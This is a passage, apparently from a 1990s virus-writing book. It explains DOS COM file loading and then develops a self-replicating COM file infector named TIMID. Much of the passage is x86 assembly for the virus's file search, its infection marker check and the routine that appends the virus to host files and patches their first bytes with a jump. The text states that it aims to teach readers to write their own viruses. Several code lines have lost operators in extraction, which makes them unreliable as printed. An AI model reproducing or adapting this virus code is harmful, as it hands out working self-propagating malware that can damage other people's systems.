At present, there are three popular assemblers on the mar

ket, and you will need one of them to do any work with computer

viruses. The first and oldest is Microsoft's Macro Assembler, or

MASM for short. It will cost you about $100 to buy it through a

mail order outlet. The second is Borland's Turbo Assembler, also

known as TASM. It goes for about $100 too. Thirdly, there is A86,

which is shareware, and available on many bulletin board systems

throughout the country. You can get a copy of it for free by calling

up one of these systems and downloading it to your computer with

a modem. Alternatively, a number of software houses make it

available for about $5 through the mail. However, if you plan to use

A86, the author demands that you pay him almost as much as if you

bought one of the other assemblers. He will hold you liable for

copyright violation if he can catch you. Personally, I don't think

A86 is worth the money. My favorite is TASM, because it does

exactly what you tell it to without trying to outsmart you. That is

exactly what you want when writing a virus. Anything less can put

bugs in you programs even when they are correctly written. Which

ever assembler you decide to use, though, the viruses in this book

19 The Little Black Book of Computer Viruses

can be compiled by all three. Batch files are provided to perform a

correct assembly with each assembler.

If you do not have an assembler, or the resources to buy

one, or the inclination to learn assembly language, the viruses are

provided in Intel hex format so they can be directly loaded onto

your computer in executable form. The program disk also contains

compiled, directly executable versions of each virus. However, if

you don't understand the assembly language source code, please

don't take these programs and run them. You're just asking for

trouble, like a four year old child with a loaded gun.

The Basics of the Computer Virus 20

Case Number

One:

A Simple COM File Infector

In this chapter we will discuss one of the simplest of all

computer viruses. This virus is very small, comprising only 264

bytes of machine language instructions. It is also fairly safe, be

cause it has one of the simplest search routines possible. This virus,

which we will call TIMID, is designed to only infect COM files

which are in the currently logged directory on the computer. It does

not jump across directories or drives, if you don't call it from

another directory, so it can be easily contained. It is also harmless

because it contains no destructive code, and it tells you when it is

infecting a new file, so you will know where it is and where it has

gone. On the other hand, its extreme simplicity means that this is

not a very effective virus. It will not infect most files, and it can

easily be caught. Still, this virus will introduce all the essential

concepts necessary to write a virus, with a minimum of complexity

and a minimal risk to the experimenter. As such, it is an excellent

instructional tool.

Some DOS Basics

To understand the means by which the virus copies itself

from one program to another, we have to dig into the details of how

the operating system, DOS, loads a program into memory and

passes control to it. The virus must be designed so it's code gets

executed, rather than just the program it has attached itself to. Only

then can it reproduce. Then, it must be able to pass control back to

the host program, so the host can execute in its entirety as well.

When one enters the name of a program at the DOSprompt,

DOS begins looking for files with that name and an extent of

``COM''. If it finds one it will load the file into memory and execute

it. Otherwise DOS will look for files with the same name and an

extent of ``EXE'' to load and execute. If no EXE file is found, the

operating system will finally look for a file with the extent ``BAT''

to execute. Failing all three of these possibilities, DOS will display

the error message ``Bad command or file name.''

EXE and COM files are directly executable by the Central

Processing Unit. Of these two types of program files, COM files

are much simpler. They have a predefined segment format which

is built into the structure of DOS, while EXE files are designed to

handle a user defined segment format, typical of very large and

complicated programs. The COM file is a direct binary image of

what should be put into memory and executed by the CPU, but an

EXE file is not.

To execute a COM file, DOS must do some preparatory

work before giving that program control. Most importantly, DOS

controls and allocates memory usage in the computer. So first it

checks to see if there is enough room in memory to load the

program. If it can, DOS then allocates the memory required for the

program. This step is little more than an internal housekeeping

function. DOS simply records how much space it is making avail

able for such and such a program, so it won't try to load another

program on top of it later, or give memory space to the program

that would conflict with another program. Such a step is necessary

because more than one program may reside in memory at any given

time. For example, popup, memory resident programs can remain

in memory, and parent programs can load child programs into

memory, which execute and then return control to the parent.

Next, DOS builds a block of memory 256 bytes long

known as the Program Segment Prefix, or PSP. The PSP is a

remnant of an older operating system known as CP/M. CP/M was

popular in the late seventies and early eighties as an operating

system for microcomputers based on the 8080 and Z80 microproc

22 The Little Black Book of Computer Viruses

essors. In the CP/M world, 64 kilobytes was all the memory a

computer had. The lowest 256 bytes of that memory was reserved

for the operating system itself to store crucial data. For example,

location 5 in memory contained a jump instruction to get to the rest

of the operating system, which was stored in high memory, and its

location differed according to how much memory the computer

had. Thus, programs written for these machines would access the

operating system functions by calling location 5 in memory. When

PCDOS came along, it imitated CP/M because CP/M was very

popular, and many programs had been written to work with it. So

the PSP (and whole COM file concept) became a part of DOS. The

result is that a lot of the information stored in the PSP is of little

Offset Size Description

0 H 2 Int 20H Instruction

2 2 Address of Last allocated segment

4 1 Reserved, should be zero

5 5 Far call to DOS function dispatcher

A 4 Int 22H vector (Terminate program)

E 4 Int 23H vector (CtrlC handler)

12 4 Int 24H vector (Critical error handler)

16 22 Reserved

2C 2 Segment of DOS environment

2E 34 Reserved

50 3 Int 21H / RETF instruction

53 9 Reserved

5C 16 File Control Block 1

6C 20 File Control Block 2

80 128 Default DTA (command line at startup)

100 Beginning of COM program

Figure 2: Format of the Program Segment Prefix.

Case Number One: A Simple COM File Infector 23

use to a DOS programmer today. Some of it is useful though, as we

will see a little later.

Once the PSP is built, DOS takes the COM file stored on

disk and loads it into memory just above the PSP, starting at offset

100H. Once this is done, DOS is almost ready to pass control to the

program. Before it does, though, it must set up the registers in the

CPU to certain predetermined values. First, the segment registers

must be set properly, or a COM program cannot run. Let's take a

look at the how's and why's of these segment registers.

In the 8088 microprocessor, all registers are 16 bit regis

ters. The problem is that a 16 bit register will only allow one to

address 64 kilobytes of memory. If you want to use more memory,

you need more bits to address it. The 8088 can address up to one

megabyte of memory using a process known as segmentation. It

uses two registers to create a physical memory address that is 20

bits long instead of just 16. Such a register pair consists of a segment

register, which contains the most significant bits of the address, and

an offset register, which contains the least significant bits. The

segment register points to a 16 byte block of memory, and the offset

register tells how many bytes to add to the start of the 16 byte block

to locate the desired byte in memory. For example, if the ds register

is set to 1275 Hex and the bx register is set to 457 Hex, then the

physical 20 bit address of the byte ds:[bx] is

1275H x 10H = 12750H

+ 457H

12BA7H

No offset should ever have to be larger than 15, but one

normally uses values up to the full 64 kilobyte range of the offset

register. This leads to the possibility of writing a single physical

address in several different ways. For example, setting ds = 12BA

Hex and bx = 7 would produce the same physical address 12BA7

Hex as in the example above. The proper choice is simply whatever

is convenient for the programmer. However, it is standard program

ming practice to set the segment registers and leave them alone as

much as possible, using offsets to range through as much data and

code as one can (64 kilobytes if necessary).

24 The Little Black Book of Computer Viruses

The 8088 has four segment registers, cs, ds, ss and es,

which stand for Code Segment, Data Segment, Stack Segment, and

Extra Segment, respectively. They each serve different purposes.

The cs register specifies the 64K segment where the actual program

instructions which are executed by the CPU are located. The Data

Segment is used to specify a segment to put the program's data in,

and the Stack Segment specifies where the program's stack is

located. The es register is available as an extra segment register for

the programmer's use. It might typically be used to point to the

video memory segment, for writing data directly to video, etc.

COM files are designed to operate with a very simple, but

limited segment structure. namely they have one segment,

cs=ds=es=ss. All data is stored in the same segment as the program

code itself, and the stack shares this segment. Since any given

segment is 64 kilobytes long, a COM program can use at most 64

kilobytes for all of its code, data and stack. When PC's were first

introduced, everybody was used to writing programs limited to 64

kilobytes, and that seemed like a lot of memory. However, today it

is not uncommon to find programs that require several hundred

kilobytes of code, and maybe as much data. Such programs must

use a more complex segmentation scheme than the COM file format

allows. The EXE file structure is designed to handle that complex

ity. The drawback with the EXE file is that the program code which

is stored on disk must be modified significantly before it can be

executed by the CPU. DOS does that at load time, and it is

completely transparent to the user, but a virus that attaches to EXE

files must not upset DOS during this modification process, or it

won't work. A COM program doesn't require this modification

process because it uses only one segment for everything. This

makes it possible to store a straight binary image of the code to be

executed on disk (the COM file). When it is time to run the program,

DOS only needs to set up the segment registers properly and

execute it.

The PSP is set up at the beginning of the segment allocated

for the COM file, i.e. at offset 0. DOS picks the segment based on

what free memory is available, and puts the PSP at the very start of

that segment. The COM file itself is loaded at offset 100 Hex, just

after the PSP. Once everything is ready, DOS transfers control to

Case Number One: A Simple COM File Infector 25

the beginning of the program by jumping to the offset 100 Hex in

the code segment where the program was loaded. From there on,

the program runs, and it accesses DOS occasionally, as it sees fit,

to perform various I/O functions, like reading and writing to disk.

When the program is done, it transfers control back to DOS, and

DOS releases the memory reserved for that program and gives the

user another command line prompt.

An Outline for a Virus

In order for a virus to reside in a COM file, it must get

control passed to its code at some point during the execution of the

program. It is conceivable that a virus could examine a COM file

and determine how it might wrest control from the program at any

point during its execution. Such an analysis would be very difficult,

though, for the general case, and the resulting virus would be

anything but simple. By far the easiest point to take control is right

at the very beginning, when DOS jumps to the start of the program.

Uninitialized

Data

Stack

Area

COM File

Image

PSP

cs=ds=es=ss

ip

sp

0H

100H

FFFFH

Figure 3: Memory map just before executing a COM file.

26 The Little Black Book of Computer Viruses

At this time, the virus is completely free to use any space above the

image of the COM file which was loaded into memory by DOS.

Since the program itself has not yet executed, it cannot have set up

data anywhere in memory, or moved the stack, so this is a very safe

time for the virus to operate. At this stage, it isn't too difficult a task

to make sure that the virus will not interfere with the host program

to damage it or render it inoperative. Once the host program begins

to execute, almost anything can happen, though, and the virus's job

becomes much more difficult.

To gain control at startup time, a virus infecting a COM

file must replace the first few bytes in the COM file with a jump to

the virus code, which can be appended at the end of the COM file.

Then, when the COM file is executed, it jumps to the virus, which

goes about looking for more files to infect, and infecting them.

When the virus is ready, it can return control to the host program.

The problem in doing this is that the virus already replaced the first

few bytes of the host program with its own code. Thus it must

restore those bytes, and then jump back to offset 100 Hex, where

the original program begins.

Here, then, is the basic plan for a simple viral infection of

a COM file. Imagine a virus sitting in memory, which has just been

Uninfected

Host

COM File

Infected

Host

COM File

TIMID

VIRUS

mov dx,257H jmp 154AH

mov dx,257H

BEFORE AFTER

100H 100H

Figure 4: Replacing the first bytes in a COM file.

Case Number One: A Simple COM File Infector 27

activated. It goes out and infects another COM file with itself. Step

by step, it might work like this:

1. An infected COM file is loaded into memory and

executed. The viral code gets control first.

2. The virus in memory searches the disk to find a

suitable COM file to infect.

3. If a suitable file is found, the virus appends its own

code to the end of the file.

4. Next, it reads the first few bytes of the file into

memory, and writes them back out to the file in a

special data area within the virus' code. The new virus

will need these bytes when it executes.

5. Next the virus in memory writes a jump instruction to

the beginning of the file it is infecting, which will pass

control to the new virus when its host program is

executed.

6. Then the virus in memory takes the bytes which were

originally the first bytes in its host, and puts them back

(at offset 100H).

7. Finally, the viral code jumps to offset 100 Hex and

allows its host program to execute.

Ok. So let's develop a real virus with these specifications. We will

need both a search mechanism and a copy mechanism.

The Search Mechanism

To understand how a virus searches for new files to infect

on an IBM PC style computer operating under MSDOS or PC

DOS, it is important to understand how DOS stores files and

information about them. All of the information about every file on

disk is stored in two areas on disk, known as the directory and the

File Allocation Table, or FAT for short. The directory contains a 32

byte file descriptor record for each file. This descriptor record

contains the file's name and extent, its size, date and time of

creation, and the file attribute, which contains essential information

28 The Little Black Book of Computer Viruses

Two Second

Increments (029)

The Attribute Field

8 Bit 0

Archive Volume

label

System

Sub

directory

Hidden Read

only

Reserved

File Size

Time Date

Reserved

File Name Reserved

A

t

t

r

First

Cluster

10H

0 Byte 0FH

1FH

The Time Field

Hours (023) Minutes (059)

15 Bit 0

The Date Field

Year (Relative to 1980) Month (112) Day (131)

15 Bit 0

The Directory Entry

Figure 5: The directory entry record format.

Case Number One: A Simple COM File Infector 29

for the operating system about how to handle the file. The FAT is a

map of the entire disk, which simply informs the operating system

which areas are occupied by which files.

Each disk has two FAT's, which are identical copies of each

other. The second is a backup, in case the first gets corrupted. On

the other hand, a disk may have many directories. One directory,

known as the root directory, is present on every disk, but the root

may have multiple subdirectories, nested one inside of another to

form a tree structure. These subdirectories can be created, used, and

removed by the user at will. Thus, the tree structure can be as simple

or as complex as the user has made it.

Both the FAT and the root directory are located in a fixed

area of the disk, reserved especially for them. Subdirectories are

stored just like other files with the file attribute set to indicate that

this file is a directory. The operating system then handles this

subdirectory file in a completely different manner than other files

to make it look like a directory, and not just another file. The

subdirectory file simply consists of a sequence of 32 byte records

describing the files in that directory. It may contain a 32 byte record

with the attribute set to directory, which means that this file is a

subdirectory of a subdirectory.

The DOS operating system normally controls all access to

files and subdirectories. If one wants to read or write to a file, he

does not write a program that locates the correct directory on the

disk, reads the file descriptor records to find the right one, figure

out where the file is and read it. Instead of doing all of this work,

he simply gives DOS the directory and name of the file and asks it

to open the file. DOS does all the grunt work. This saves a lot of

time in writing and debugging programs. One simply does not have

to deal with the intricate details of managing files and interfacing

with the hardware.

DOS is told what to do using interrupt service routines

(ISR's). Interrupt 21H is the main DOS interrupt service routine

that we will use. To call an ISR, one simply sets up the required

CPU registers with whatever values the ISR needs to know what to

do, and calls the interrupt. For example, the code

30 The Little Black Book of Computer Viruses

mov ds,SEG FNAME ;ds:dx points to filename

mov dx,OFFSET FNAME

xor al,al ;al=0

mov ah,3DH ;DOS function 3D

int 21H ;go do it

opens a file whose name is stored in the memory location FNAME

in preparation for reading it into memory. This function tells DOS

to locate the file and prepare it for reading. The ``int 21H'' instruc

tion transfers control to DOS and lets it do its job. When DOS is

finished opening the file, control returns to the statement immedi

ately after the ``int 21H''. The register ah contains the function

number, which DOS uses to determine what you are asking it to do.

The other registers must be set up differently, depending on what

ah is, to convey more information to DOS about what it is supposed

to do. In the above example, the ds:dx register pair is used to point

to the memory location where the name of the file to open is stored.

The register al tells DOS to open the file for reading only.

All of the various DOS functions, including how to set up

all the registers, are detailed in many books on the subject. Peter

Norton's Programmer's Guide to the IBM PC is one of the better

ones, so if you don't have that information readily available, I

suggest you get a copy. Here we will only discuss the DOS

functions we need, as we need them. This will probably be enough

to get by. However, if you are going to write viruses of your own,

it is definitely worthwhile knowing about all of the various func

tions you can use, as well as the finer details of how they work and

what to watch out for.

To write a routine which searches for other files to infect,

we will use the DOS search functions. The people who wrote DOS

knew that many programs (not just viruses) require the ability to

look for files and operate on them if any of the required type are

found. Thus, they incorporated a pair of searching functions into

the interrupt 21H handler, called Search First and Search Next.

These are some of the more complicated DOS functions, so they

require the user to do a fair amount of preparatory work before he

calls them. The first step is to set up an ASCIIZ string in memory

to specify the directory to search, and what files to search for. This

is simply an array of bytes terminated by a null byte (0). DOS can

Case Number One: A Simple COM File Infector 31

search and report on either all the files in a directory or a subset of

files which the user can specify by file attribute and by specifying

a file name using the wildcard characters ``?'' and ``*'', which you

should be familiar with from executing commands like copy *.* a:

and dir a???_100.* from the command line in DOS. (If not, a basic

book on DOS will explain this syntax.) For example, the ASCIIZ

string

DB '\system\hyper.*',0

will set up the search function to search for all files with the name

hyper, and any possible extent, in the subdirectory named system.

DOS might find files like hyper.c, hyper.prn, hyper.exe, etc.

After setting up this ASCIIZ string, one must set the

registers ds and dx up to the segment and offset of this ASCIIZ

string in memory. Register cl must be set to a file attribute mask

which will tell DOS which file attributes to allow in the search, and

which to exclude. The logic behind this attribute mask is somewhat

complex, so you might want to study it in detail in Appendix G.

Finally, to call the Search First function, one must set ah = 4E Hex.

If the search first function is successful, it returns with

register al = 0, and it formats 43 bytes of data in the Disk Transfer

Area, or DTA. This data provides the program doing the search with

the name of the file which DOS just found, its attribute, its size and

its date of creation. Some of the data reported in the DTA is also

used by DOS for performing the Search Next function. If the search

cannot find a matching file, DOS returns al nonzero, with no data

in the DTA. Since the calling program knows the address of the

DTA, it can go examine that area for the file information after DOS

has stored it there.

To see how this function works more clearly, let us consider

an example. Suppose we want to find all the files in the currently

logged directory with an extent ``COM'', including hidden and

system files. The assembly language code to do the Search First

would look like this (assuming ds is already set up correctly):

SRCH_FIRST:

mov dx,OFFSET COMFILE;set offset of asciiz string

mov cl,00000110B ;set hidden and system attributes

32 The Little Black Book of Computer Viruses

mov ah,4EH ;search first function

int 21H ;call DOS

or al,al ;check to see if successful

jnz NOFILE ;go handle no file found condition

FOUND: ;come here if file found

COMFILE DB '*.COM',0

If this routine executed successfully, the DTA might look like this:

03 3F 3F 3F 3F 3F 3F 3F3F 43 4F 4D 06 18 00 00 .????????COM....

00 00 00 00 00 00 16 9830 13 BC 62 00 00 43 4F ........0..b..CO

4D 4D 41 4E 44 2E 43 4F4D 00 00 00 00 00 00 00 MMAND.COM.......

when the program reaches the label FOUND. In this case the search

found the file COMMAND.COM.

In comparison with the Search First function, the Search

Next is easy, because all of the data has already been set up by the

Search First. Just set ah = 4F hex and call DOS interrupt 21H:

mov ah,4FH ;search next function

int 21H ;call DOS

or al,al ;see if a file was found

jnz NOFILE ;no, go handle no file found

FOUND2: ;else process the file

If another file is found the data in the DTA will be updated with the

new file name, and ah will be set to zero on return. If no more

matches are found, DOS will set ah to something besides zero on

return. Onemustbe careful here so the data in the DTA is not altered

between the call to Search First and later calls to Search Next,

because the Search Next expects the data from the last search call

to be there.

Of course, the computer virus does not need to search

through all of the COM files in a directory. It must find one that

will be suitable to infect, and then infect it. Let us imagine a

procedure FILE_OK. Given the name of a file on disk, it will

determine whether that file is good to infect or not. If it is infectable,

FILE_OK will return with the zero flag, z, set, otherwise it will

return with the zero flag reset. We can use this flag to determine

whether to continue searching for other files, or whether we should

go infect the one we have found.

Case Number One: A Simple COM File Infector 33

If our search mechanism as a whole also uses the z flag to

tell the main controlling program that it has found a file to infect

(z=file found, nz=no file found) then our completed search function

can be written like this:

FIND_FILE:

mov dx,OFFSET COMFILE

mov al,00000110B

mov ah,4EH ;perform search first

int 21H

FF_LOOP:

or al,al ;any possibilities found?

jnz FF_DONE ;no exit with z reset

call FILE_OK ;yes, go check if we can infect it

jz FF_DONE ;yes exit with z set

mov ah,4FH ;no search for another file

int 21H

jmp FF_LOOP ;go back up and see what happened

FF_DONE:

ret ;return to main virus control routine

Figure 6: Logic of the file search routine.

Setup Search Spec

(*.COM, Hidden, System OK)

Search for First

Matching File

File Found?

No Exit

No File

File OK?

Yes

Search for

Next File

Exit, File Found

Yes

No

34 The Little Black Book of Computer Viruses

Study this search routine carefully. It is important to un

derstand if you want to write computer viruses, and more generally,

it is useful in a wide variety of programs of all kinds.

Of course, for our virus to work correctly, we have to write

the FILE_OK function which determines whether a file should be

infected or left alone. This function is particularly important to the

success or failure of the virus, because it tells the virus when and

where to move. If it tells the virus to infect a program which does

not have room for the virus, then the newly infected program may

be inadvertently ruined. Or if FILE_OK cannot tell whether a

program has already been infected, it will tell the virus to go ahead

and infect the same file again and again and again. Then the file

will grow larger and larger, until there is no more room for an

infection. For example, the routine

FILE_OK:

xor al,al

ret

simply sets the z flag and returns. If our search routine used this

subroutine, it would always stop and say that the first COM file it

found was the one to infect. The result would be that the first COM

program in a directory would be the only program that would ever

get infected. It would just keep getting infected again and again,

and growing in size, until it exceeded its size limit and crashed. So

although the above example of FILE_OK might enable the virus to

infect at least one file, it would not work well enough for the virus

to be able to start jumping from file to file.

A good FILE_OK routine must perform two checks: (1) it

must check a file to see if it is too long to attach the virus to, and

(2) it must check to see if the virus is already there. If the file is

short enough, and the virus is not present, FILE_OK should return

a ``go ahead'' to the search routine.

On entry to FILE_OK, the search function has set up the

DTAwith 43 bytes of information about the file to check, including

its size and its name. Suppose that we have defined two labels,

FSIZE and FNAME in the DTA to access the file size and file name

respectively. Then checking the file size to see if the virus will fit

is a simple matter. Since the file size of a COM file is always less

Case Number One: A Simple COM File Infector 35

than 64 kilobytes, we may load the size of the file we want to infect

into the ax register:

mov ax,WORD PTR [FSIZE]

Next we add the number of bytes the virus will have to add

to this file, plus 100H. The 100H is needed because DOS will also

allocate room for the PSP, and load the program file at offset 100H.

To determine the number of bytes the virus will need automatically,

we simply put a label VIRUS at the start of the virus code we are

writing and a label END_VIRUS at the end of it, and take the

difference. If we add these bytes to ax, and ax overflows, then the

file which the search routine has found is too large to permit a

successful infection. An overflow will cause the carry flag c to be

set, so the file size check will look something like this:

FILE_OK:

mov ax,WORD PTR [FSIZE]

add ax,OFFSET END_VIRUS OFFSET VIRUS + 100H

jc BAD_FILE

.

.

.

GOOD_FILE:

xor al,al

ret

BAD_FILE:

mov al,1

or al,al

ret

This routine will suffice to prevent the virus from infecting any file

that is too large.

The next problem that the FILE_OK routine must deal with

is how to avoid infecting a file that has already been infected. This

can only be accomplished if the virus has some understanding of

how it goes about infecting a file. In the TIMID virus, we have

decided to replace the first few bytes of the host program with a

jump to the viral code. Thus, the FILE_OK procedure can go out

and read the file which is a candidate for infection to determine

whether its first instruction is a jump. If it isn't, then the virus

obviously has not infected that file yet. There are two kinds of jump

36 The Little Black Book of Computer Viruses

instructions which might be encountered in a COM file, known as

a near jump and a short jump. The virus we create here will always

use a near jump to gain control when the program starts. Since a

short jump only has a range of 128 bytes, we could not use it to

infect a COM file larger than 128 bytes. The near jump allows a

range of 64 kilobytes. Thus it can always be used to jump from the

beginning of a COM file to the virus, at the end of the program, no

matter how big the COM file is (as long as it is really a valid COM

file). A near jump is represented in machine language with the byte

E9 Hex, followed by two bytes which tell the CPU how far to jump.

Thus, our first test to see if infection has already occurred is to check

to see if the first byte in the file is E9 Hex. If it is anything else, the

virus is clear to go ahead and infect.

Looking for E9Hex is not enough though. ManyCOM files

are designed so the first instruction is a jump to begin with. Thus

the virus may encounter files which start with an E9 Hex even

though they have never been infected. The virus cannot assume that

a file has been infected just because it starts with an E9. It must go

farther. It must have a way of telling whether a file has been infected

even when it does start with E9. If we do not incorporate this extra

step into the FILE_OK routine, the virus will pass by many good

COM files which it could infect because it thinks they have already

been infected. While failure to incorporate such a feature into

FILE_OK will not cause the virus to fail, it will limit its function

ality.

One way to make this test simple and yet very reliable is

to change a couple more bytes than necessary at the beginning of

the host program. The near jump will require three bytes, so we

might take two more, and encode them in a unique way so the virus

can be pretty sure the file is infected if those bytes are properly

encoded. The simplest scheme is to just set them to some fixed

value. We'll use the two characters ``VI'' here. Thus, when a file

begins with a near jump followed by the bytes ``V''=56H and

``I''=49H, we can be almost positive that the virus is there, and

otherwise it is not. Granted, once in a great while the virus will

discover a COM file which is set up with a jump followed by ``VI''

even though it hasn't been infected. The chances of this occurring

Case Number One: A Simple COM File Infector 37

are so small, though, that it will be no great loss if the virus fails to

infect this rare one file in a million. It will infect everything else.

To read the first five bytes of the file, we open it with DOS

Interrupt 21H function 3D Hex. This function requires us to set

ds:dx to point to the file name (FNAME) and to specify the access

rights which we desire in the al register. In the FILE_OK routine

the virus only needs to read the file. Yet there we will try to open it

with read/write access, rather than readonly access. If the file

attribute is set to readonly, an attempt to open in read/write mode

will result in an error (which DOS signals by setting the carry flag

on return from INT 21H). This will allow the virus to detect

readonly files and avoid them, since the virus must write to a file

to infect it. It is much better to find out that the file is readonly

here, in the search routine, than to assume the file is good to infect

and then have the virus fail when it actually attempts infection.

Thus, when opening the file, we set al = 2 to tell DOS to open it in

read/write mode. If DOS opens the file successfully, it returns a file

handle in ax. This is just a number which DOS uses to refer to the

file in all future requests. The code to open the file looks like this:

mov ax,3D02H

mov dx,OFFSET FNAME

int 21H

jc BAD_FILE

Figure 7: The file handle and file pointer.

File Handle = 6

File Pointer =723

Program (RAM)

DOS (in RAM)

Physical File

(on disk)

723H

38 The Little Black Book of Computer Viruses

Once the file is open, the virus may perform the actual read

operation, DOS function 3F Hex. To read a file, one must set bx

equal to the file handle number and cx to the number of bytes to

read from the file. Also ds:dx must be set to the location in memory

where the data read from the file should be stored (which we will

call START_IMAGE). DOS stores an internal file pointer for each

open file which keeps track of where in the file DOS is going to do

its reading and writing from. The file pointer is just a four byte long

integer, which specifies which byte in the selected file a read or

write operation refers to. This file pointer starts out pointing to the

first byte in the file (file pointer = 0), and it is automatically

advanced by DOS as the file is read from or written to. Since it

starts at the beginning of the file, and the FILE_OK procedure must

read the first five bytes of the file, there is no need to touch the file

pointer right now. However, you should be aware that it is there,

hidden away by DOS. It is an essential part of any file reading and

writing we may want to do. When it comes time for the virus to

infect the file, it will have to modify this file pointer to grab a few

bytes here and put them there, etc. Doing that is much faster (and

hence, less noticeable) than reading a whole file into memory,

manipulating it in memory, and then writing it back to disk. For

now, though, the actual reading of the file is fairly simple. It looks

like this:

mov bx,ax ;put handle in bx

mov cx,5 ;prepare to read 5 bytes

mov dx,OFFSET START_IMAGE ;to START_IMAGE

mov ah,3FH

int 21H ;go do it

We will not worry about the possibility of an error in

reading five bytes here. The only possible error is that the file is not

long enough to read five bytes, and we are pretty safe in assuming

that most COM files will have more than four bytes in them.

Finally, to close the file, we use DOS function 3E Hex and

put the file handle in bx. Putting it all together, the FILE_OK

procedure looks like this:

FILE_OK:

mov dx,OFFSET FNAME ;first open the file

mov ax,3D02H ;r/w access open file

Case Number One: A Simple COM File Infector 39

int 21H

jc FOK_NZEND ;error opening file file can't be used

mov bx,ax ;put file handle in bx

push bx ;and save it on the stack

mov cx,5 ;read 5 bytes at the start of the program

mov dx,OFFSET START_IMAGE ;and store them here

mov ah,3FH ;DOS read function

int 21H

pop bx ;restore the file handle

mov ah,3EH

int 21H ;and close the file

mov ax,WORD PTR [FSIZE] ;get the file size of the host

add ax,OFFSET ENDVIRUS OFFSET VIRUS ;and add size of virus to it

jc FOK_NZEND ;c set if ax overflows (size > 64k)

cmp BYTE PTR [START_IMAGE],0E9H ;size okis first byte a near jmp?

jnz FOK_ZEND ;not near jmp, file must be ok, exit with z

cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4?

jnz FOK_ZEND ;no, file can be infected, return with Z set

FOK_NZEND:

mov al,1 ;we'd better not infect this file

or al,al ;so return with z reset

ret

FOK_ZEND:

xor al,al ;ok to infect, return with z set

ret

This completes our discussion of the search mechanism for the

virus.

The Copy Mechanism

After the virus finds a file to infect, it must carry out the

infection process. We have already briefly discussed how that is to

be accomplished, but now let's write the code that will actually do

it. We'll put all of this code into a routine called INFECT.

The code for INFECT is quite straightforward. First the

virus opens the file whose name is stored at FNAME in read/write

mode, just as it did when searching for a file, and it stores the file

handle in a data area called HANDLE. This time, however we want

to go to the end of the file and store the virus there. To do so, we

first move the file pointer using DOS function 42H. In calling

function 42H, the register bx must be set up with the file handle

number, and cx:dx must contain a 32 bit long integer telling where

to move the file pointer to. There are three different ways this

function can be used, as specified by the contents of the al register.

If al=0, the file pointer is set relative to the beginning of the file. If

al=1, it is incremented relative to the current location, and if al=2,

40 The Little Black Book of Computer Viruses

cx:dx is used as the offset from the end of the file. Since the first

thing the virus must do is place its code at the end of the COM file

it is attacking, it sets the file pointer to the end of the file. This is

easy. Set cx:dx=0, al=2 and call function 42H:

xor cx,cx

mov dx,cx

mov bx,WORD PTR [HANDLE]

mov ax,4202H

int 21H

With the file pointer in the right location, the virus can now

write itself out to disk at the end of this file. To do so, one simply

uses the DOS write function, 40 Hex. To use function 40H one must

set ds:dx to the location in memory where the data is stored that is

going to be written to disk. In this case that is the start of the virus.

Next, set cx to the number of bytes to write and bx to the file handle.

There is one problem here. Since the virus is going to be

attaching itself to COM files of all different sizes, the address of

the start of the virus code is not at some fixed location in memory.

Every file it is attached to will put it somewhere else in memory.

So the virus has to be smart enough to figure out where it is. To do

this we will employ a trick in the main control routine, and store

the offset of the viral code in a memory location named

VIR_START. Here we assume that this memory location has al

ready been properly initialized. Then the code to write the virus to

the end of the file it is attacking will simply look like this:

mov cx,OFFSET FINAL OFFSET VIRUS

mov bx,WORD PTR [HANDLE]

mov dx,WORD PTR [VIR_START]

mov ah,40H

int 21H

where VIRUS is a label identifying the start of the viral code and

FINAL is a label identifying the end of the code. OFFSET FINAL

OFFSET VIRUS is independent of the location of the virus in

memory.

Case Number One: A Simple COM File Infector 41

Now, with the main body of viral code appended to the end

of the COM file under attack, the virus must do some cleanup

work. First, it must move the first five bytes of the COM file to a

storage area in the viral code. Then it must put a jump instruction

plus the code letters 'VI'at the start of the COM file. Since we have

already read the first five bytes of the COM file in the search

routine, they are sitting ready and waiting for action at START_IM

AGE. We need only write them out to disk in the proper location.

Note that there must be two separate areas in the virus to store five

bytes of startup code. The active virus must have the data area

START_IMAGE to store data from files it wants to infect, but it

must also have another area, which we'll call START_CODE. This

contains the first five bytes of the file it is actually attached to.

Without START_CODE, the active virus will not be able to transfer

control to the host program it is attached to when it is done

executing.

To write the first five bytes of the file under attack, the virus

must take the five bytes at START_IMAGE, and store them where

START_CODE is located on disk. First, the virus sets the file

pointer to the location of START_CODE on disk. To find that

location, one must take the original file size (stored at FSIZE by

Figure 8: START_IMAGE and START_CODE.

Host 2

START_CODE

Virus

On Disk

Host 1

Virus

START_CODE

START_IMAGE

In Memory

42 The Little Black Book of Computer Viruses

the search routine), and add OFFSET START_CODE OFFSET

VIRUS to it, moving the file pointer with respect to the beginning

of the file:

xor cx,cx

mov dx,WORD PTR [FSIZE]

add dx,OFFSET START_CODE OFFSET VIRUS

mov bx,WORD PTR [HANDLE]

mov ax,4200H

int 21H

Next, the virus writes the five bytes at START_IMAGE out to the

file:

mov cx,5

mov bx,WORD PTR [HANDLE]

mov dx,OFFSET START_IMAGE

mov ah,40H

int 21H

The final step in infecting a file is to set up the first five

bytes of the file with a jump to the beginning of the virus code,

along with the identification letters ``VI''. To do this, first position

the file pointer to the beginning of the file:

xor cx,cx

mov dx,cx

mov bx,WORD PTR [HANDLE]

mov ax,4200H

int 21H

Next, wemust set up a data area in memorywith the correct

information to write to the beginning of the file. START_IMAGE

is a good place to set up these bytes since the data there is no longer

needed for anything. The first byte should be a near jump instruc

tion, E9 Hex:

mov BYTE PTR [START_IMAGE],0E9H

The next two bytes should be a word to tell the CPU how

many bytes to jump forward. This byte needs to be the original file

size of the host program, plus the number of bytes in the virus which

are before the start of the executable code (we will put some data

Case Number One: A Simple COM File Infector 43

there). We must also subtract 3 from this number because the

relative jump is always referenced to the current instruction pointer,

which will be pointing to 103H when the jump is actually executed.

Thus, the two bytes telling the program where to jump are set up

by

mov ax,WORD PTR [FSIZE]

add ax,OFFSET VIRUS_START OFFSET VIRUS 3

mov WORD PTR [START_IMAGE+1],ax

Finally set up the ID bytes 'VI' in our five byte data area,

mov WORD PTR [START_IMAGE+3],4956H ;'VI'

write the data to the start of the file, using the DOS write function,

mov cx,5

mov dx,OFFSET START_IMAGE

mov bx,WORD PTR [HANDLE]

mov ah,40H

int 21H

and then close the file using DOS,

mov ah,3EH

mov bx,WORD PTR [HANDLE]

int 21H

This completes the copy mechanism.

Data Storage for the Virus

One problem we must face in creating this virus is how to

locate data. Since all jumps and calls in a COM file are relative, we

needn't do anything fancy to account for the fact that the virus must

